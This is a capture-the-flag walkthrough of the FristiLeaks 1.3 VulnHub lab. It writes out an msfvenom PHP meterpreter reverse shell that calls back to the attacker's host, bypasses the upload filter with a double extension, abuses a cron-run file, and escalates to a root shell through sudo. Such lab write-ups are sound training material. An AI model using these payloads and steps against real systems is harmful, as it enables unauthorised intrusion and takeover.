VulnHub - FristiLeaks 1.3

Aug 30, 2019

Information

Name Author Series Difficulty
FristiLeask 1.3 Ar0xA FristiLeaks Normal

Let’s Start

We start with checking our IP address with:

ifconfig

Check IP So our IP is:

192.168.1.22

Now open Zenmap (nmap GUI verison), and do a “Quick Scan” for the IP “192.168.1.*” ( * symbolize for every number) Zenmap Scan We found that the Target IP is:

192.168.1.26

And that only the http (80) port is open, so we need to check the web server with FireFox Web Page

Right click and “View Page Source” Source Page

So it will take something like 4 hours and we need to get root premission.

Let’s try to check what we have on the web server with Nikto

nikto -h 192.168.1.26 ![Nikto Scan](https://i.imgur.com/75cCBHo.png)

We see that we hace 3 folders with the names:

  • cola
  • sisi
  • beer

so let’s try to get them in FireFox Cola Page

Each page has the same picture that this is not the url we looking for, so what it is? Cola, sisi, beer are all drinks so maybe we are looking for fristi?? let’s check it Fristi Page Bingo! So we have a login page, what now? Again, let’s check the source of the page (right click > View Source Page) Fristi Source Page1

We use base64 encoding for images

OK and…? We scroll down and see a big comment Big Comment

maybe it’s encode by base64 codecs? Let’s check with Burp Suite (there are a lot of options, some of them online) Go to Decoder tab, paste the comment and choose decode as.. base64 We can see in the header that this is a png file! Brup Suite Decoder So let’s decode this base64 code to png file (you can use any site that do this operation) Image Decoder And we got the password!! enter image description here

keKkeKKeKKeKkEkkEk

but where is the username? Let’s have a second look on the source of the page. Now I can see it! he wrote his name. By Username

eezeepz

So we have username and password.

Username Password
eezeepz keKkeKKeKKeKkEkkEk

Type them and log in. Log In

We’re in, and we can upload files, so let’s create tcp revese shell and upload it. We can do that with msfvenom (it’s tool of Metasploit that generate payloads).

 msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.22 LPORT=4444 -f raw > Desktop/phpshell.php

Let’s break it down -

  • msfvenom - the software we use
  • -p php/meterpreter/reverse_tcp - the payload we want to use
  • LHOST 192.168.1.22 - our host to send the information to.
  • LPORT 4444 - the port we want to work on
  • -f raw - the file format we want
  • > Desktop/phpshell.php - where we want to save the file and the name of it

Msfvenom And now go upload the file Upload the File

Broswe File Go to Desktop -> and choose phpshell.php Upload File click upload. We got an error because the file extensions is php and only

  • png
  • jpg
  • gif

are allowed. So, there are some options to fix this, the easy one (if its work) is just add the png extension to the end of the file. Change The Extension Let’s try upload it again now. Uploading again And… it’s done. Uploaded Now we want to start listening to this port, so we open msfconsole.

msfconsole and update our settings

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.22
set lport 4444
exploit

Start Listening and now we are start listening. Open the location of the file in FireFox (in Uploads folder). File Location And now we can see connection in the msfconsole New Connection And start digging in the files, in the folder /var/www

cd /var/www We found some text file, open it.

cat notes.txt

Notes In Www

The message sends us to eezeepz folder

cd /home/eezeepz

Again we found some text file, open it.

cat notes.txt

And we got Notes.txt By the message, we want to use the chmod command to set the admin folder available. The chmod command found in the folder home/admin/chmod. For the echo command we need a shall so open one

shell

And now

echo "home/admin/chmod 777 /home/admin" > /tmp/runthis Let's Break it:
  • echo - Is command to output text
  • “home/admin/chmod”- we want to use the chmod command and by the message this is the folder for it.
  • 777 - give all the permissionsfor every useres group.
  • /home/admin - on this folder.
  • > /tmp/runtime- put this text there (this folder run the commands). Now wait up to one minute until the command is run.

Echo Command

Now we can move to the admin folder. Move To Admin

In this folder we have 3 files to check 3 Files

  • cryptedpass.txt
  • cryptpass.py
  • whoisyourgodnow.txt

Let’s open each of them.

whoisyourgodnow.txt Whoisyourgodnow.txt

=RFn0AKnlMHMPIzpyuTI0ITG

cryptedpass.txt Cryptedpass.txt

mVGZ303omkJLmy2pcuTq

cryptpass.py Cryptpass.py We can see that python program get the string, encode it with base64 codec, reverse the text and then encode it with rot13 codec

so

  1. base64
  2. reverse
  3. rot13

So let’s reverse engineering this, we start we decode the rot13, reverse the text, and then decode the base64. python program

import codecs
print "password: "
str = 'mVGZ303omkJLmy2pcuTq'
str = codecs.decode(str, 'rot13')
str = str[::-1]
str = codecs.decode(str, 'base64')
print str

print "text: "
str = '=RFn0AKnlMHMPIzpyuTI0ITG'
str = codecs.decode(str, 'rot13')
str = str[::-1]
str = codecs.decode(str, 'base64')
print str ![Python Program](https://i.imgur.com/QzGplfU.png) Save this file in Desktop, and run it.

cd ~/Desktop
python decoder.py ![Decoder](https://i.imgur.com/9jfDQan.png) And now we have password for something. We saw that we have 3 different users
  • eezeepz
  • fristigod
  • root

So let’s try to switch to the fristigod user.

su fristigod

Su Fristigod We only can do this with TTY shell so let’s open one. We can do this by python that import pty this package can start process ,one of them is a TTY shell.

python -c 'import pty; pty.spawn("/bin/sh");'    Let's break it
  • python - we want to use python.
  • -c - (flag) that this is a python in this command.
  • import pty - import that package.

  • pty.spawn(“/bin/sh”)- create process of TTY shell. TTY Shell Now we have full interactive shell! Let’s try again change user.

    su fristigod

With the password.

LetThereBeFristi!

Su FristiGod S Now we can move to fristigod folder.

cd /var/fristigod And check the files there (even the hidden ones).

ls -al
  • a - (flag) for hidden files.
  • l - (flag) long format show, include permissions, size and etc.

Fristigod Folder We have 2 files

  • .bash_history
  • .secret_admin_stuff

Let’s check the bash_history.

cat .bash_history ![Bash History](https://i.imgur.com/rTECStt.png) We can see that we have a file in *secret_admin_stuff* with the name *doCom* that can be executed. So move to this folder.

cd .secret_admin_stuff/ And than show all the files.

ls -al we can see *doCom* file and his owner is the *root*.

doCom

Let’s try to run it.

./doCom

Wrong user Wrong user? OK, maybe run it with the fristi user?

sudo -u frisit ./doCom

(u flag to choose user) terminal command OK , saw the correct way to run this program is with a terminal command. So let’s give us the full privilege for the bash shell.

sudo -u fristi ./doCom /bin/bash

So now we can go to the root folder.

cd /root Check the files in it.

ls -al We can see a text file, so open it.

cat fristileaks_secrets.txt

Finish

The flag is:

y0u_kn0w_y0u_l0ve_fr1st1

 Tags
 Related